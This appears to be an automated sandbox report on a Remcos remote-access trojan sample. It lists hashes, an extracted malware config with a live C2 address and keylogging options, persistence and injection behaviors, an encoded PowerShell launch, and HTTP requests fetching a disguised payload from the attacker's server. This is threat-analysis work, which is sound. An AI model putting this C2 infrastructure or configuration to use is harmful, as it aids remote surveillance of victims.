Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/02/2023, 18:44 UTC

General

  • Target

    d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe

  • Size

    7KB

  • MD5

    b359f4af5c88b1e237db9738415b7682

  • SHA1

    d7fa6d87594ea4d8b5740d54fdc204b08f4e9439

  • SHA256

    53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd

  • SHA512

    6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb

  • SSDEEP

    96:xtEsKVeCVIP7bLp8LAn5c8aY1ej/kKV+J2qzNt:xUVVIP7bLrEOejcKYx

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

194.180.49.17:28282

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    rdfghfgjkgoighjc.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    true

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PC1DJ2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
    "C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4788
    • C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      2⤵
        PID:3184
      • C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
        C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
        2⤵
        • Checks computer location settings
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4244
        • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe
          "C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2108
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe
            C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetWindowsHookEx
            PID:4688

    Network

    • flag-nl
      GET
      http://194.180.49.17/Vvlhkp.bmp
      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      Remote address:
      194.180.49.17:80
      Request
      GET /Vvlhkp.bmp HTTP/1.1
      Host: 194.180.49.17
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: image/bmp
      Last-Modified: Fri, 03 Feb 2023 02:52:01 GMT
      Accept-Ranges: bytes
      ETag: "cbc6437d7a37d91:0"
      Server: Microsoft-IIS/10.0
      Date: Fri, 03 Feb 2023 18:44:22 GMT
      Content-Length: 5437440
    • flag-nl
      GET
      http://194.180.49.17/Vvlhkp.bmp
      rdfghfgjkgoighjc.exe
      Remote address:
      194.180.49.17:80
      Request
      GET /Vvlhkp.bmp HTTP/1.1
      Host: 194.180.49.17
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: image/bmp
      Last-Modified: Fri, 03 Feb 2023 02:52:01 GMT
      Accept-Ranges: bytes
      ETag: "cbc6437d7a37d91:0"
      Server: Microsoft-IIS/10.0
      Date: Fri, 03 Feb 2023 18:45:12 GMT
      Content-Length: 5437440
    • flag-us
      DNS
      geoplugin.net
      rdfghfgjkgoighjc.exe
      Remote address:
      8.8.8.8:53
      Request
      geoplugin.net
      IN A
      Response
      geoplugin.net
      IN A
      178.237.33.50
    • flag-nl
      GET
      http://geoplugin.net/json.gp
      rdfghfgjkgoighjc.exe
      Remote address:
      178.237.33.50:80
      Request
      GET /json.gp HTTP/1.1
      Host: geoplugin.net
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      date: Fri, 03 Feb 2023 18:45:36 GMT
      server: Apache
      expires: Fri, 03 Feb 2023 18:45:36 GMT
      content-length: 930
      content-type: application/json; charset=utf-8
      cache-control: public, max-age=300
      access-control-allow-origin: *
    • 93.184.221.240:80
      260 B
      5
    • 194.180.49.17:80
      http://194.180.49.17/Vvlhkp.bmp
      http
      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      199.2kB
      5.8MB
      3132
      4168

      HTTP Request

      GET http://194.180.49.17/Vvlhkp.bmp

      HTTP Response

      200
    • 93.184.220.29:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 104.80.225.205:443
      322 B
      7
    • 194.180.49.17:80
      rdfghfgjkgoighjc.exe
      260 B
      5
    • 13.69.239.73:443
      322 B
      7
    • 194.180.49.17:80
      http://194.180.49.17/Vvlhkp.bmp
      http
      rdfghfgjkgoighjc.exe
      110.7kB
      5.6MB
      2222
      4013

      HTTP Request

      GET http://194.180.49.17/Vvlhkp.bmp

      HTTP Response

      200
    • 194.180.49.17:28282
      tls
      rdfghfgjkgoighjc.exe
      2.9kB
      1.4kB
      12
      14
    • 178.237.33.50:80
      http://geoplugin.net/json.gp
      http
      rdfghfgjkgoighjc.exe
      301 B
      1.3kB
      5
      3

      HTTP Request

      GET http://geoplugin.net/json.gp

      HTTP Response

      200
    • 8.8.8.8:53
      geoplugin.net
      dns
      rdfghfgjkgoighjc.exe
      59 B
      75 B
      1
      1

      DNS Request

      geoplugin.net

      DNS Response

      178.237.33.50

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe

      Filesize

      7KB

      MD5

      b359f4af5c88b1e237db9738415b7682

      SHA1

      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439

      SHA256

      53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd

      SHA512

      6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb

    • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe

      Filesize

      7KB

      MD5

      b359f4af5c88b1e237db9738415b7682

      SHA1

      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439

      SHA256

      53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd

      SHA512

      6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb

    • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe

      Filesize

      7KB

      MD5

      b359f4af5c88b1e237db9738415b7682

      SHA1

      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439

      SHA256

      53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd

      SHA512

      6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      4280e36a29fa31c01e4d8b2ba726a0d8

      SHA1

      c485c2c9ce0a99747b18d899b71dfa9a64dabe32

      SHA256

      e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

      SHA512

      494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      1210b299f9239432a1e7b06d65bf7304

      SHA1

      3ae3e66b37e6f10753e32e1bf72a612b297b395e

      SHA256

      e35e5dc177e469252adac3cd093231d57cb60af30a8c5508e1c7fddabcdf69d1

      SHA512

      3de3b7dc783556398d1ecaffe9c9bcb3470d0568913b5fee23d20db4821b312370fc9f505a911544f82297fb01cd13df1aec2620dbdcbb226304ab0353ed4f6f

    • memory/688-133-0x0000000000A90000-0x0000000000A98000-memory.dmp

      Filesize

      32KB

    • memory/688-134-0x0000000007A50000-0x0000000007A72000-memory.dmp

      Filesize

      136KB

    • memory/4244-147-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4244-145-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4244-151-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4244-146-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-163-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-162-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-161-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-160-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4788-138-0x00000000057C0000-0x0000000005826000-memory.dmp

      Filesize

      408KB

    • memory/4788-136-0x0000000004910000-0x0000000004946000-memory.dmp

      Filesize

      216KB

    • memory/4788-137-0x0000000004F80000-0x00000000055A8000-memory.dmp

      Filesize

      6.2MB

    • memory/4788-139-0x0000000005830000-0x0000000005896000-memory.dmp

      Filesize

      408KB

    • memory/4788-140-0x0000000005E90000-0x0000000005EAE000-memory.dmp

      Filesize

      120KB

    • memory/4788-141-0x0000000007700000-0x0000000007D7A000-memory.dmp

      Filesize

      6.5MB

    • memory/4788-142-0x0000000006390000-0x00000000063AA000-memory.dmp

      Filesize

      104KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.